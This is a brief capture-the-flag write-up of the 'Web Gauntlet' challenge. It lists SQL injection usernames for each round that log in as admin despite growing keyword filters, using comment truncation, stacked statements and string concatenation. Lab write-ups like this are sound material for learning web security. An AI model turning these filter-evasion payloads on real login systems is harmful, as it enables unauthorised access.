Web Gauntlet¶
Query executed:
SELECT * FROM users WHERE username='<Username>' AND password='<Password>'
Round 1¶
Filter: or
\
Submit username: admin';--
Round 2¶
Filter: or
and
like
=
--
\
Submit username: admin'; SELECT * FROM users WHERE '1
Round 3¶
Filter: or
and
like
=
<
>
--
\
The previous solution should work, but isn't. Checking response in Networks tab of filter.php shows us the actual one \
Filter: <space>
or
and
like
=
<
>
--
\
Submit username: admin';'1
Round 4¶
Filter: <space>
or
and
like
=
<
>
--
admin
\
Submit username: admi'||'n';'1
Round 5¶
Filter: <space>
or
and
like
=
<
>
--
union
admin
\
Previous one works